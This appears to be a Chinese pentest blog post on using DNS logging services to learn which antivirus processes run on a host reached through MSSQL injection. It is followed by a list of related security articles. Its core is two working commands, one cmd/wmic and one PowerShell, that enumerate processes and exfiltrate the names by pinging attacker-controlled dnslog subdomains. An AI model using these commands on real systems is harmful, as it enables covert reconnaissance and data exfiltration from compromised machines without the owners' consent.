如何利用dnslog探测目标主机杀软

简介: 如何利用dnslog探测目标主机杀软


0x01 前言

2021年7月某天,团队@Twe1ve老哥遇到这样一个场景:MSSQL高权限注入,目标主机不出网,想利用dnslog探测这台主机中是否存在杀软?


当时想都没想,就回了句难搞!其实还是能实现的,最后和他一起测试出了两种方法。


0x02 利用cmdshell for循环实现

两种方法原理一样,都是先获取目标主机的进程,然后通过for、ForEach循环Ping dnslog外带出来。

    for /F %i in ('wmic process get Name ^| findstr ".exe"') do ping -n 1 %i.******.dnslog.cn >nul


    0x03 利用powershell foreach循环实现

    以下命令是@Twe1ve老哥整出来的,加了个去重,但是在实际测试过程中发现好像并没有起到去重效果。最后别忘了删除一下1.txt文件!

      powershell -c "Get-Process | select processname > 1.txt"
      powershell -c "Get-Content .\1.txt | Sort-Object -Unique | ForEach-Object {if($_ -match $regex){$b=$_.trim();ping -n 1 $b'.***fks2j.ns.dns3.cf.'} }"


      注:dnslog.cn及其他大多数dnslog平台的前端仅能展示最近十条记录,想要获取完整记录可以使用ceye.iodns.xn--9tr.com,用xn--9tr在获取记录时请打开F12看请求。

      相关文章
      |
      10月前
      |
      生物认证
      第二轮学习笔记: 扫描工具 -- nmap指纹识别与探测
      第二轮学习笔记: 扫描工具 -- nmap指纹识别与探测
      388 0
      |
      安全
      CobaltStrike YARA规则 检测 环境搭建
      CobaltStrike YARA规则 检测 环境搭建
      94 0
      |
      4月前
      |
      安全 Linux 网络安全
      nmap 是一款强大的开源网络扫描工具,能检测目标的开放端口、服务类型和操作系统等信息
      nmap 是一款强大的开源网络扫描工具,能检测目标的开放端口、服务类型和操作系统等信息。本文分三部分介绍 nmap:基本原理、使用方法及技巧、实际应用及案例分析。通过学习 nmap,您可以更好地了解网络拓扑和安全状况,提升网络安全管理和渗透测试能力。
      304 5
      |
      5月前
      |
      缓存 网络协议 IDE
      主动信息搜集:基于ARP的主机发现
      主动信息搜集:基于ARP的主机发现
      63 0
      |
      7月前
      |
      网络协议 Ubuntu Linux
      |
      7月前
      |
      安全 网络协议 网络安全
      Python 渗透测试:黑客内外网信息收集.(帮助 得到信息攻击计算机内外网.)
      Python 渗透测试:黑客内外网信息收集.(帮助 得到信息攻击计算机内外网.)
      77 0
      |
      9月前
      |
      网络协议 Linux Shell
      基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
      基础入门-反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
      |
      存储 安全 网络协议
      文件cs上线主机及攻击使用ping工具
      Hancitor是一种信息窃取程序和恶意软件下载程序,被指定为MAN1,Moskalvzapoe或TA511的威胁参与者使用。在2018年的威胁简介中,我们指出Hancitor相对不成熟,但在未来数年中仍将是威胁。大约三年后,Hancitor仍然是一种威胁,并且已经演变为使用Cobalt Strike之类的工具。最近几个月,该参与者开始使用网络ping工具来帮助枚举受感染主机的Active Directory(AD)环境。该博客说明了Hancitor背后的威胁参与者如何使用网络ping工具,以便安全专业人员可以更好地识别和阻止其使用。
      265 0
      文件cs上线主机及攻击使用ping工具

      热门文章

      最新文章